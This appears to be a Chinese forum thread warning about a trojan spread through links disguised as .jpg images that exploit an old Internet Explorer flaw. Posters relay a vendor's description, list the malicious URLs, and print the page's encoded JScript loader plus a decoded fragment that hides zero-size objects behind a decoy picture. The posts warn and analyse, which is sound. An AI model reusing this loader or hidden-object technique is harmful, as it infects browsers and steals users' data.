警报：美女图片隐藏病毒 导致多种软件无法运行

coolfax

2月27日，全球反病毒监测网率先截获一个通过图片链接地址传播的恶性病毒，用户只要点击：http://qianhui.9966.org/zhaopian/me.jpg

网址，会出现一副美女图片，有些中毒的用户会出现杀毒软件、OFFICE软件、任务管理器、各种专杀工具等无法运行、且无法登陆杀毒公司网址等现象。

　　据了解，该病毒可能是“传奇女贼”病毒的一个最新变种，已经在网络上快速泛滥，并且有大量用户中招，如果用户点击该链接则会出现一幅美女图片，因此反病毒专家强烈建议用户，遇到该链接地址时不要点击。目前该病毒正在紧急处理中。



[B]大家可不要点击那个网址啊～～～因为现在还没有杀毒软件可以杀掉这个病毒！[/B]

guest

真有这么厉害？

菠萝

什么原理啊，图片中有”可执行代码“？

coolfax

2月27日,瑞星全球反病毒监测网率先截获一个传播非常迅速，破坏性很强的的恶性病毒—“美女杀手（Trojan.Legend.Syspoet.B）”，该病毒会将自己伪装成：http://qianhui.9966.org/zhaopian/me.jpg

之类的网址，当用户点击该网址时会出现一副美女照片，当照片被打开的时候用户的电脑则已经被病毒感染。

    该病毒会利用微软浏览器的漏洞进行攻击，浏览器版本级别低于IE6.0SP1的电脑染毒后，病毒会修改一些文件的关联，导致OFFICE软件、任务管理器、注册表编辑器等程序无法使用，该病毒还会破坏资源管理器，只要用户打开四层以上的目录，病毒就会自动关闭“资源管理器”。该病毒还会干掉含有“杀毒”字样的窗口，因此会造成一些反病毒软件及病毒专杀工具无法使用、一些反病毒公司的主页无法登陆等现象。另外该病毒还会修改用户电脑的系统配置，导致用户重启系统时无法进入“我的电脑”。

    除此之外，该病毒还会盗取《传奇》游戏的密码和其他信息，并通过十几个邮件服务器，向外发送大量的病毒邮件，阻塞网络。

    瑞星反病毒工程师介绍，没有被感染的用户可以通过个人防火墙来预防该病毒，当用户发现有“Mshta.exe”的程序访问外部网络时，应该立刻禁止，如果该程序访问网络成功，将会对用户电脑产生上述破坏。

    据悉，象“美女杀手”这种通过图片链接地址感染计算机的病毒已经大量在网络中涌现，而且大多数是通过QQ软件进行传播的，因此当用户收到：http://qiumei.3322.org/zhaopian/me.jpg、[url]http://jiawei.6600.org/zhaopian/me.jpg、http://siting.8800.org/zhaopian/me.jpg、http://qianhui.9966.org/zhaopian/me.jpg、http://xiujuan.2288.org/zhaopian/me.jpg、http://www.onlyy.net/soft/haha.jpg[/url]

这几个网址时，千万不要点击，因为这些地址不但会出现美女照片（见附图一），还会使用户中毒，而且当用户收到类似网址时，也要注意分辨，不要轻易点击。

    问及“美女杀手”病毒可以通过图片传播的原因，瑞星公司研发部反病毒分部经理蔡骏告诉记者，该病毒是采用今年年初发现的IE浏览器最新漏洞进行传播的，由于微软IE浏览器在处理图片及脚本文件时存在缺陷，远程攻击者可以利用这个缺陷对目标用户浏览器进行拒绝服务攻击或执行任意指令，因此该缺陷最终导致了“美女杀手”病毒的泛滥。

    蔡骏还告诉记者，目前微软公司还没有提供该漏洞的相关解决方案，但是IE6.0SP1以上版本不存在该漏洞，因此还未中招的用户应尽快登陆：网址，将IE浏览器升级到最新版本。

    瑞星公司已经提供了该病毒的解决方案，并将在2月27日晚升级瑞星杀毒软件，16.15.20版本可彻底查杀该病毒，已经染毒的用户可以登陆：
http://it.rising.com.cn/service/technology/RS_QQMsender.htm

下载免费的QQ专杀工具（2.3版）来查杀该病毒

coolfax

该病毒的代码：

<html>
<head>
<script language="JScript.Encode">#@~^xQEAAA==@#@&@!Z O@#@&\mD,AWMNdP{JYf;tYss]22]Z9Y!z]2Z8W[zu&3]Z9]ZbYf;W4%n1YY Z[mYCu&G] yhbUEa/ lkwY+y] ZA+botDYffZ]y!Ak[O4]ffu+!Z]f3u&Z&G(LnmDY22YZfu!bu&;r:T]+!kD^Y2f:H Lao]23Y!G]ZbY&/G(LnmDY ZNCOm]&9Yy 4+^sKRCkwu  u ZA+bo4Yu&9Tu !SrNDt]29Y Z!u&3]f/JW8L^Yu&3YZf]T)u&/z(G9XY22u!fu!zY&;z4YsVYfAJPJ&w!YPHG;D,mMk2YG~1W[+,OtDn@#@&0EU^DkGx,G!YAKD9`#@#@&P@#@&7l.P +AAKDNkI@#@&x+SAGD9/,'~EUnkmCwchKD[d*i@#@&[Km;:UDRAMkD+` +SAWMNd#p@#@&N,@#@&K;YSWD9cbi@#@&Jz~OR@*@#@&Qn4AAA==^#~@</script>
</head>
<body>
</body>
</html>

coolfax

这段这段代码经过了2次加密

经过我解密后源码如下：


<script language="JScript.Encode">
<!--
var words ="<html>
<body>
<object data="winups.asp" weight=0 width= 0></object>
<img src=my.jpg>
<object data="hello.asp" weight=0 width= 0></object>
%0</script>

countstar

最初由 coolfax 发布
[B]这段这段代码经过了2次加密

经过我解密后源码如下：


<script language="JScript.Encode">
<!--
var words ="<html>
<body>
<object data="winups.asp" weight=0 width= 0></object>
<img src=my.jpg>
<object data="hello.asp" weight=0 width= 0></object>
%0</script> [/B]

问下你是如何解密的？

takelook

打开了，有什么症状？？？？？
解密？？？ 你也打开了？？？

NoName

我只发现有些图片链接本来是jpg的，但保存的时候怎么保存都是bmp。
原来是个javescript,那点点也没有关系。:)

NoName

<html>
<head>
<script language="JScript.Encode">#@~^xQEAAA==@#@&@!Z O@#@&\mD,AWMNdP{JYf;tYss]22]Z9Y!z]2Z8W[zu&3]Z9]ZbYf;W4%n1YY Z[mYCu&G] yhbUEa/ lkwY+y] ZA+botDYffZ]y!Ak[O4]ffu+!Z]f3u&Z&G(LnmDY22YZfu!bu&;r:T]+!kD^Y2f:H Lao]23Y!G]ZbY&/G(LnmDY ZNCOm]&9Yy 4+^sKRCkwu  u ZA+bo4Yu&9Tu !SrNDt]29Y Z!u&3]f/JW8L^Yu&3YZf]T)u&/z(G9XY22u!fu!zY&;z4YsVYfAJPJ&w!YPHG;D,mMk2YG~1W[+,OtDn@#@&0EU^DkGx,G!YAKD9`#@#@&P@#@&7l.P        +AAKDNkI@#@&x+SAGD9/,'~EUnkmCwchKD[d*i@#@&[Km;:UDRAMkD+`        +SAWMNd#p@#@&N,@#@&K;YSWD9cbi@#@&Jz~OR@*@#@&Qn4AAA==^#~@</script>
</head>
<body>
</body>
</html>


代码确实如这样子。